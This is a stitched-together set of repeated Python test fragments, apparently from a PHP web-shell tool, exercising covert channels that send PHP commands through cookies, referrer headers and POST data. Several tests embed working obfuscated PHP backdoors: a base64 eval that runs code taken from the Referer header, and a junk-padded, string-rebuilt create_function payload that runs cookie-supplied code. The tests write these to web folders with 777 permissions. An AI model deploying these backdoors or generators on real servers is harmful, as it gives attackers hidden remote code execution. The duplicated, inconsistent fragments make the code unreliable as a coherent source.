def test_generators(self): for i in range(0, 500): self._randomize_bd() obfuscated = generate(self.password) save_generated(obfuscated, self.path) self.channel = Channel(self.url, self.password) self._clean_bd()
class LegacyCookieChannel(BaseTest): url = config.base_url + '/test_channels/legacycookie_php.php' def setUp(self): self.channel = Channel('LegacyCookie', { 'url': self.url, 'password': self.password }) def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send('echo("%s");' % payload)[0], payload) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20) def test_additional_headers(self): self.channel.channel_loaded.additional_headers = [ ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'), ('User-Agent', 'CLIENT'), ('X-Other-Cookie', 'OTHER') ] headers_string = self.channel.send('print_r(getallheaders());')[0] self.assertRegexpMatches( headers_string, '\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+' ) self.assertRegexpMatches(headers_string, '\[User-Agent\] => CLIENT') self.assertRegexpMatches(headers_string, '\[X-Other-Cookie\] => OTHER') self.channel.channel_loaded.additional_headers = [] def test_wrong_cert(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) channel = Channel('LegacyCookie', {'url': url, 'password': '******'}) try: channel.send('echo("1");') except Exception as e: self.fail("LegacyCookie test_wrong_cert exception\n%s" % (str(e)))
def setUp(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) self.channel = Channel('StegaRef', {'url': url, 'password': '******'})
class LegacyReferrerChannel(BaseTest): url = config.base_url + '/test_channels/legacyreferrer.php' password = '******' def setUp(self): self.channel = Channel('LegacyReferrer', { 'url': self.url, 'password': self.password }) def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send('echo("%s");' % payload)[0], payload) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20) def test_additional_headers(self): self.channel.channel_loaded.additional_headers = [ ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4'), ('Referer', 'REFERER'), ('X-Other-Cookie', 'OTHER') ] headers_string = self.channel.send('print_r(getallheaders());')[0] self.assertIn('[Cookie] => C1=F1; C2=F2; C3=F3; C4=F4', headers_string) self.assertNotIn('REFERER1', headers_string) self.assertIn('[X-Other-Cookie] => OTHER', headers_string) def test_wrong_cert(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) channel = Channel('LegacyReferrer', {'url': url, 'password': '******'}) try: channel.send('echo("1");') except Exception as e: self.fail("LegacyReferrer test_wrong_cert exception\n%s" % (str(e)))
class LegacyCookieChannel(BaseTest): def setUp(self): self.channel = Channel('LegacyCookie', { 'url': self.url, 'password': self.password }) def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send('echo("%s");' % payload)[0], payload) @classmethod def setUpClass(cls): cls._randomize_bd() obfuscated = generate(cls.password, agent='legacycookie_php') save_generated(obfuscated, cls.path) @classmethod def tearDownClass(cls): # Check the agent presence, could be already deleted if os.path.isfile(cls.path): subprocess.check_call(config.cmd_env_remove_s % cls.path, shell=True) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20) def test_additional_headers(self): self.channel.channel_loaded.additional_headers = [ ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'), ('User-Agent', 'CLIENT'), ('X-Other-Cookie', 'OTHER') ] headers_string = self.channel.send('print_r(getallheaders());')[0] self.assertRegexpMatches( headers_string, '\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+' ) self.assertRegexpMatches(headers_string, '\[User-Agent\] => CLIENT') self.assertRegexpMatches(headers_string, '\[X-Other-Cookie\] => OTHER') self.channel.channel_loaded.additional_headers = []
def test_generators(self): for i in range(0, 100): self._randomize_bd() obfuscated = generate(self.password) save_generated(obfuscated, self.path) self.channel = Channel('StegaRef', { 'url': self.url, 'password': self.password }) self._clean_bd()
def test_wrong_cert(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) channel = Channel('LegacyCookie', {'url': url, 'password': '******'}) try: channel.send('echo("1");') except Exception as e: self.fail("LegacyCookie test_wrong_cert exception\n%s" % (str(e)))
def test_generators(self): for i in range(0, 100): self._randomize_bd() obfuscated = generate(self.password) save_generated(obfuscated, self.path) self.channel = Channel('ObfPost', { 'url': self.url, 'password': self.password }) self._incremental_requests(10, 100, 30, 50) self._clean_bd()
class TestGenerators(TestCase): def test_generators(self): for i in range(0, 100): self._randomize_bd() obfuscated = generate(self.password) save_generated(obfuscated, self.path) self.channel = Channel('StegaRef', { 'url': self.url, 'password': self.password }) self._clean_bd() def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send('echo("%s");' % payload)[0], payload) @classmethod def _randomize_bd(cls): cls.password = utils.strings.randstr(10) password_hash = hashlib.md5(cls.password).hexdigest().lower() filename = '%s_%s.php' % (__name__, cls.password) cls.url = os.path.join(base_url, 'generators', filename) cls.path = os.path.join(base_folder, 'generators', filename) @classmethod def _clean_bd(cls): os.remove(cls.path)
def setup(self): """Instauration of the PHP channel. Returns the module status.""" # Return if already set. This check has to be done due to # the slack initialization in run() if self.channel: return # Try a single channel if is manually set, else # probe every the supported channel from config if self.session.get('channel'): channels = [self.session['channel']] else: channels = config.channels for channel_name in channels: channel = Channel(url=self.session['url'], password=self.session['password'], channel_name=channel_name) status = self._check_interpreter(channel) if status == Status.RUN: self.session['channel'] = channel_name self.channel = channel break log.debug('PHP setup %s %s' % ('running' if status == Status.RUN else 'failed', 'with %s channel' % (channel_name) if status == Status.RUN else '')) return status
def setup(self): """Instauration of the PHP channel. Returns the module status.""" # Try a single channel if is manually set, else # probe every the supported channel from config if self.session.get('channel'): channels = [self.session['channel']] else: channels = config.channels for channel_name in channels: channel = Channel( channel_name=channel_name, session=self.session ) status = self._check_interpreter(channel) if status == Status.RUN: self.session['channel'] = channel_name self.channel = channel break log.debug( 'PHP setup %s %s' % ( 'running' if status == Status.RUN else 'failed', 'with %s channel' % (channel_name) if status == Status.RUN else '' ) ) return status
class StegaRefChannel(BaseTest): def setUp(self): self.channel = Channel( 'StegaRef', { 'url' : self.url, 'password' : self.password } ) def _incremental_requests( self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send( 'echo("%s");' % payload)[0], payload)
def test_generators(self): for i in range(0, 500): self._randomize_bd() obfuscated = generate(self.password) save_generated(obfuscated, self.path) self.channel = Channel(self.url, self.password, 'StegaRef') self._clean_bd()
def setUp(self): self.channel = Channel( 'ObfPost', { 'url' : self.url, 'password' : self.password } )
def setUp(self): self.channel = Channel( 'LegacyReferrer', { 'url' : self.url, 'password' : self.password } )
def setUp(self): self.channel = Channel( 'LegacyCookie', { 'url' : self.url, 'password' : self.password } )
class StegaRefChannelWrongCert(BaseTest): def setUp(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) self.channel = Channel('StegaRef', {'url': url, 'password': '******'}) def test_wrong_cert(self): try: self.channel.send('echo("1");') except Exception as e: self.fail("test_wrong_cert exception\n%s" % (str(e)))
def setUp(self): self.channel = Channel( 'StegaRef', { 'url' : self.url, 'password' : self.password } )
def setUp(self): self.channel = Channel( 'StegaRef', { 'url' : config.base_url + '/test_channels/stegaref.php', 'password' : self.password } )
def _instantiate_channel(self): """The channel presence check and eventual instantation has to be done both in setup() than in run(), to have a slack instantiation""" if self.channel: return self.channel = Channel(url=self.session['url'], password=self.session['password'], channel_name=self.session['channel'])
class LegacyReferrerChannel(BaseTest): def setUp(self): self.channel = Channel(self.url, self.password, 'LegacyReferrer') def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send('echo("%s");' % payload)[0], payload) @classmethod def setUpClass(cls): if config.debug: stream_handler.setLevel(logging.DEBUG) else: stream_handler.setLevel(logging.INFO) cls._randomize_bd() cls.password = '******' # Check `config.script_folder` permissions if (subprocess.check_output( config.cmd_env_stat_permissions_s % (config.script_folder), shell=True).strip() != config.script_folder_expected_perms): raise DevException( "Error: give to the http user full permissions to the folder \'%s\'" % config.script_folder) obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>""" tmp_handler, tmp_path = tempfile.mkstemp() save_generated(obfuscated, tmp_path) subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path), shell=True) subprocess.check_call(config.cmd_env_chmod_s_s % ('777', cls.path), shell=True) @classmethod def tearDownClass(cls): # Check the agent presence, could be already deleted if os.path.isfile(cls.path): subprocess.check_call(config.cmd_env_remove_s % cls.path, shell=True) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20)
def test_wrong_cert(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) channel = Channel( 'LegacyReferrer', { 'url' : url, 'password' : 'none' } ) try: channel.send('echo("1");') except Exception as e: self.fail("LegacyReferrer test_wrong_cert exception\n%s" % (str(e)))
class StegaRefChannel(BaseTest): def setUp(self): self.channel = Channel(self.url, self.password, 'StegaRef') def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send('echo("%s");' % payload)[0], payload)
def setUp(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) self.channel = Channel( 'StegaRef', { 'url' : url, 'password' : 'none' } )
class StegaRefChannelWrongCert(BaseTest): def setUp(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) self.channel = Channel( 'StegaRef', { 'url' : url, 'password' : 'none' } ) def test_wrong_cert(self): try: self.channel.send('echo("1");') except Exception as e: self.fail("test_wrong_cert exception\n%s" % (str(e)))
class ObfPostChannel(BaseTest): def setUp(self): self.channel = Channel('ObfPost', { 'url': self.url, 'password': self.password }) def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) result = self.channel.send('echo("%s");' % payload.decode('utf-8'))[0] self.assertEqual(result, payload)
class BaseStegaRefChannel(BaseTest): def setUp(self): self.channel = Channel( 'StegaRef', { 'url': config.base_url + '/test_channels/stegaref.php', 'password': self.password }) def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send('echo("%s");' % payload)[0], payload)
class TestGenerators(TestCase): def test_generators(self): for i in range(0, 100): self._randomize_bd() obfuscated = generate(self.password) save_generated(obfuscated, self.path) self.channel = Channel( 'ObfPost', { 'url' : self.url, 'password' : self.password } ) self._incremental_requests(10, 100, 30, 50) self._clean_bd() def _incremental_requests( self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send( 'echo("%s");' % payload)[0], payload) @classmethod def _randomize_bd(cls): cls.password = utils.strings.randstr(10) password_hash = hashlib.md5(cls.password).hexdigest().lower() filename = '%s_%s.php' % ( __name__, cls.password) cls.url = os.path.join(base_url, 'generators', filename) cls.path = os.path.join(base_folder, 'generators', filename) @classmethod def _clean_bd(cls): os.remove(cls.path)
def test_generators(self): for i in range(0, 100): self._randomize_bd() obfuscated = generate(self.password) save_generated(obfuscated, self.path) self.channel = Channel( 'ObfPost', { 'url' : self.url, 'password' : self.password } ) self._incremental_requests(10, 100, 30, 50) self._clean_bd()
class BaseDefaultChannel(BaseTest): def setUp(self): self.channel = Channel(self.url, self.password) def _incremental_requests( self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = randstr(i) self.assertEqual( self.channel.send( 'echo("%s");' % payload)[0], payload)
def run(self): cchannel = os.path.join(os.path.dirname(self.session['path']), "channels") Channel.add_to_chan(self.args["url"], self.args["password"], cchannel) return "Entry point " + self.args["url"] + ":" + self.args[ "password"] + " added"
class LegacyReferrerChannel(BaseTest): def setUp(self): self.channel = Channel( 'LegacyReferrer', { 'url' : self.url, 'password' : self.password } ) def _incremental_requests( self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send( 'echo("%s");' % payload)[0], payload) @classmethod def setUpClass(cls): if config.debug: stream_handler.setLevel(logging.DEBUG) else: stream_handler.setLevel(logging.INFO) cls._randomize_bd() cls.password = '******' # Check `config.script_folder` permissions, comparing just the # last 3 digits if ( subprocess.check_output( config.cmd_env_stat_permissions_s % (config.script_folder), shell=True).strip()[-3:] != config.script_folder_expected_perms[-3:] ): raise DevException( "Error: give the required permissions to the folder \'%s\'" % config.script_folder ) obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>""" tmp_handler, tmp_path = tempfile.mkstemp() save_generated(obfuscated, tmp_path) subprocess.check_call( config.cmd_env_move_s_s % (tmp_path, cls.path), shell=True) subprocess.check_call( config.cmd_env_chmod_s_s % ('0777', cls.path), shell=True) @classmethod def tearDownClass(cls): # Check the agent presence, could be already deleted if os.path.isfile(cls.path): subprocess.check_call( config.cmd_env_remove_s % cls.path, shell=True ) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20) def test_additional_headers(self): self.channel.channel_loaded.additional_headers = [ ( 'Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4'), ( 'Referer', 'REFERER'), ( 'X-Other-Cookie', 'OTHER') ] headers_string = self.channel.send( 'print_r(getallheaders());' )[0] self.assertIn('[Cookie] => C1=F1; C2=F2; C3=F3; C4=F4', headers_string) self.assertNotIn('REFERER1', headers_string) self.assertIn('[X-Other-Cookie] => OTHER', headers_string) def test_wrong_cert(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) channel = Channel( 'LegacyReferrer', { 'url' : url, 'password' : 'none' } ) try: channel.send('echo("1");') except Exception as e: self.fail("LegacyReferrer test_wrong_cert exception\n%s" % (str(e)))
def run(self): cchannel = os.path.join(os.path.dirname(self.session['path']), "channels") Channel.del_from_chanFile(self.args["url"], cchannel) return "Entry point " + self.args["url"] + " removed"
class LegacyCookieChannel(BaseTest): def setUp(self): self.channel = Channel( 'LegacyCookie', { 'url' : self.url, 'password' : self.password } ) def _incremental_requests( self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send( 'echo("%s");' % payload)[0], payload) @classmethod def setUpClass(cls): cls._randomize_bd() obfuscated = generate(cls.password, agent='legacycookie_php') save_generated(obfuscated, cls.path) @classmethod def tearDownClass(cls): # Check the agent presence, could be already deleted if os.path.isfile(cls.path): subprocess.check_call( config.cmd_env_remove_s % cls.path, shell=True ) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20) def test_additional_headers(self): self.channel.channel_loaded.additional_headers = [ ( 'Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'), ( 'User-Agent', 'CLIENT'), ( 'X-Other-Cookie', 'OTHER') ] headers_string = self.channel.send( 'print_r(getallheaders());' )[0] self.assertRegexpMatches(headers_string, '\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+') self.assertRegexpMatches(headers_string, '\[User-Agent\] => CLIENT') self.assertRegexpMatches(headers_string, '\[X-Other-Cookie\] => OTHER') self.channel.channel_loaded.additional_headers = [ ] def test_wrong_cert(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) channel = Channel( 'LegacyCookie', { 'url' : url, 'password' : 'none' } ) try: channel.send('echo("1");') except Exception as e: self.fail("LegacyCookie test_wrong_cert exception\n%s" % (str(e)))
def run(self): cchannel = os.path.join(os.path.dirname(self.session['path']),"channels") Channel.del_from_chanFile(self.args["url"], cchannel) return "Entry point "+self.args["url"]+" removed"
def setUp(self): self.channel = Channel('StegaRef', { 'url': self.url, 'password': self.password })
class LegacyReferrerChannel(BaseTest): def setUp(self): self.channel = Channel('LegacyReferrer', { 'url': self.url, 'password': self.password }) def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send('echo("%s");' % payload)[0], payload) @classmethod def setUpClass(cls): if config.debug: stream_handler.setLevel(logging.DEBUG) else: stream_handler.setLevel(logging.INFO) cls._randomize_bd() cls.password = '******' # Check `config.script_folder` permissions, comparing just the # last 3 digits if (subprocess.check_output(config.cmd_env_stat_permissions_s % (config.script_folder), shell=True).strip()[-3:] != config.script_folder_expected_perms[-3:]): raise DevException( "Error: give the required permissions to the folder \'%s\'" % config.script_folder) obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>""" tmp_handler, tmp_path = tempfile.mkstemp() save_generated(obfuscated, tmp_path) subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path), shell=True) subprocess.check_call(config.cmd_env_chmod_s_s % ('0777', cls.path), shell=True) @classmethod def tearDownClass(cls): # Check the agent presence, could be already deleted if os.path.isfile(cls.path): subprocess.check_call(config.cmd_env_remove_s % cls.path, shell=True) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20) def test_additional_headers(self): self.channel.channel_loaded.additional_headers = [ ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4'), ('Referer', 'REFERER'), ('X-Other-Cookie', 'OTHER') ] headers_string = self.channel.send('print_r(getallheaders());')[0] self.assertIn('[Cookie] => C1=F1; C2=F2; C3=F3; C4=F4', headers_string) self.assertNotIn('REFERER1', headers_string) self.assertIn('[X-Other-Cookie] => OTHER', headers_string)
class LegacyCookieChannel(BaseTest): def setUp(self): self.channel = Channel(self.url, self.password, 'LegacyCookie') def _incremental_requests(self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send('echo("%s");' % payload)[0], payload) @classmethod def setUpClass(cls): if config.debug: stream_handler.setLevel(logging.DEBUG) else: stream_handler.setLevel(logging.INFO) cls._randomize_bd() cls.password = '******' # Check `config.script_folder` permissions if (subprocess.check_output( config.cmd_env_stat_permissions_s % (config.script_folder), shell=True).strip() != config.script_folder_expected_perms): raise DevException( "Error: give to the http user full permissions to the folder \'%s\'" % config.script_folder) obfuscated = """<?php $xcrd="mVwbeoGFjZShhceonJheSgnL1teXHc9XeoHeoNdLycsJy9ccy8nKSwgYXeoJyYXkeooJycsJysnKSwgam"; $dqlt="JGMeo9J2NvdW50JzskYT0kX0NPT0tJRTtpeoZihyZXNldCgkeoYSk9PSdhcycgJeoiYeogJGMoeoJGEpP"; $lspg="9pbihhcnJheeoV9zbeoGljZSgeokYeoSeowkYygkYSktMykpKSkpO2VeojaG8gJzwvJyeo4kay4nPic7fQ=="; $tylz="jMpeyRreoPeoSeodkYXeoNkJztlY2hvICc8Jy4kay4nPieoc7ZXZhbeoChiYXNlNjRfZGVjb2RlKHByZWdfeoc"; $toja = str_replace("z","","zsztr_zrzezpzlazce"); $apod = $toja("q", "", "qbaqsqeq6q4_qdecodqe"); $fyqt = $toja("uw","","uwcruweuwauwtuwe_funuwcuwtuwiouwn"); $sify = $fyqt('', $apod($toja("eo", "", $dqlt.$tylz.$xcrd.$lspg))); $sify(); ?>""" tmp_handler, tmp_path = tempfile.mkstemp() save_generated(obfuscated, tmp_path) subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path), shell=True) subprocess.check_call(config.cmd_env_chmod_s_s % ('777', cls.path), shell=True) @classmethod def tearDownClass(cls): # Check the agent presence, could be already deleted if os.path.isfile(cls.path): subprocess.check_call(config.cmd_env_remove_s % cls.path, shell=True) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20) def test_additional_headers(self): self.channel.channel_loaded.additional_headers = [ ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'), ('User-Agent', 'CLIENT'), ('X-Other-Cookie', 'OTHER') ] headers_string = self.channel.send('print_r(getallheaders());')[0] self.assertRegexpMatches( headers_string, '\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+' ) self.assertRegexpMatches(headers_string, '\[User-Agent\] => CLIENT') self.assertRegexpMatches(headers_string, '\[X-Other-Cookie\] => OTHER') self.channel.channel_loaded.additional_headers = []
class LegacyCookieChannel(BaseTest): url = config.base_url + '/test_channels/legacycookie_php.php' def setUp(self): self.channel = Channel( 'LegacyCookie', { 'url' : self.url, 'password' : self.password } ) def _incremental_requests( self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send( 'echo("%s");' % payload)[0], payload) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20) def test_additional_headers(self): self.channel.channel_loaded.additional_headers = [ ( 'Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'), ( 'User-Agent', 'CLIENT'), ( 'X-Other-Cookie', 'OTHER') ] headers_string = self.channel.send( 'print_r(getallheaders());' )[0] self.assertRegexpMatches(headers_string, '\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+') self.assertRegexpMatches(headers_string, '\[User-Agent\] => CLIENT') self.assertRegexpMatches(headers_string, '\[X-Other-Cookie\] => OTHER') self.channel.channel_loaded.additional_headers = [ ] def test_wrong_cert(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) channel = Channel( 'LegacyCookie', { 'url' : url, 'password' : 'none' } ) try: channel.send('echo("1");') except Exception as e: self.fail("LegacyCookie test_wrong_cert exception\n%s" % (str(e)))
class LegacyReferrerChannel(BaseTest): url = config.base_url + '/test_channels/legacyreferrer.php' password = '******' def setUp(self): self.channel = Channel( 'LegacyReferrer', { 'url' : self.url, 'password' : self.password } ) def _incremental_requests( self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send( 'echo("%s");' % payload)[0], payload) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20) def test_additional_headers(self): self.channel.channel_loaded.additional_headers = [ ( 'Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4'), ( 'Referer', 'REFERER'), ( 'X-Other-Cookie', 'OTHER') ] headers_string = self.channel.send( 'print_r(getallheaders());' )[0] self.assertIn('[Cookie] => C1=F1; C2=F2; C3=F3; C4=F4', headers_string) self.assertNotIn('REFERER1', headers_string) self.assertIn('[X-Other-Cookie] => OTHER', headers_string) def test_wrong_cert(self): ip = _get_google_ip() if not ip: return url = 'https://%s/nonexistent' % (ip) channel = Channel( 'LegacyReferrer', { 'url' : url, 'password' : 'none' } ) try: channel.send('echo("1");') except Exception as e: self.fail("LegacyReferrer test_wrong_cert exception\n%s" % (str(e)))
def setUp(self): self.channel = Channel( 'StegaRef', { 'url': config.base_url + '/test_channels/stegaref.php', 'password': self.password })
def setUp(self): self.channel = Channel(self.url, self.password, 'LegacyReferrer')
def setUp(self): self.channel = Channel('LegacyCookie', { 'url': self.url, 'password': self.password })
def setUp(self): self.channel = Channel(self.url, self.password, 'StegaRef')
class LegacyCookieChannel(BaseTest): def setUp(self): self.channel = Channel(self.url, self.password, 'LegacyCookie') def _incremental_requests( self, size_start, size_to, step_rand_start, step_rand_to): for i in range(size_start, size_to, random.randint(step_rand_start, step_rand_to)): payload = utils.strings.randstr(i) self.assertEqual( self.channel.send( 'echo("%s");' % payload)[0], payload) @classmethod def setUpClass(cls): if config.debug: stream_handler.setLevel(logging.DEBUG) else: stream_handler.setLevel(logging.INFO) cls._randomize_bd() cls.password = '******' # Check `config.script_folder` permissions if ( subprocess.check_output( config.cmd_env_stat_permissions_s % (config.script_folder), shell=True).strip() != config.script_folder_expected_perms ): raise DevException( "Error: give to the http user full permissions to the folder \'%s\'" % config.script_folder ) obfuscated = """<?php $xcrd="mVwbeoGFjZShhceonJheSgnL1teXHc9XeoHeoNdLycsJy9ccy8nKSwgYXeoJyYXkeooJycsJysnKSwgam"; $dqlt="JGMeo9J2NvdW50JzskYT0kX0NPT0tJRTtpeoZihyZXNldCgkeoYSk9PSdhcycgJeoiYeogJGMoeoJGEpP"; $lspg="9pbihhcnJheeoV9zbeoGljZSgeokYeoSeowkYygkYSktMykpKSkpO2VeojaG8gJzwvJyeo4kay4nPic7fQ=="; $tylz="jMpeyRreoPeoSeodkYXeoNkJztlY2hvICc8Jy4kay4nPieoc7ZXZhbeoChiYXNlNjRfZGVjb2RlKHByZWdfeoc"; $toja = str_replace("z","","zsztr_zrzezpzlazce"); $apod = $toja("q", "", "qbaqsqeq6q4_qdecodqe"); $fyqt = $toja("uw","","uwcruweuwauwtuwe_funuwcuwtuwiouwn"); $sify = $fyqt('', $apod($toja("eo", "", $dqlt.$tylz.$xcrd.$lspg))); $sify(); ?>""" tmp_handler, tmp_path = tempfile.mkstemp() save_generated(obfuscated, tmp_path) subprocess.check_call( config.cmd_env_move_s_s % (tmp_path, cls.path), shell=True) subprocess.check_call( config.cmd_env_chmod_s_s % ('777', cls.path), shell=True) @classmethod def tearDownClass(cls): # Check the agent presence, could be already deleted if os.path.isfile(cls.path): subprocess.check_call( config.cmd_env_remove_s % cls.path, shell=True ) def test_1_100_requests(self): self._incremental_requests(1, 100, 1, 2) def test_100_1000_requests(self): self._incremental_requests(100, 1000, 10, 20)
def setUp(self): self.channel = Channel(self.url, self.password, 'LegacyCookie')
def setUp(self): self.channel = Channel('LegacyReferrer', { 'url': self.url, 'password': self.password })
def setUp(self): self.channel = Channel(self.url, self.password)
def run(self): cchannel = os.path.join(os.path.dirname(self.session['path']),"channels") Channel.add_to_chan(self.args["url"],self.args["password"],cchannel) return "Entry point "+self.args["url"]+":"+self.args["password"]+" added"
def setUp(self): self.channel = Channel('ObfPost', { 'url': self.url, 'password': self.password })
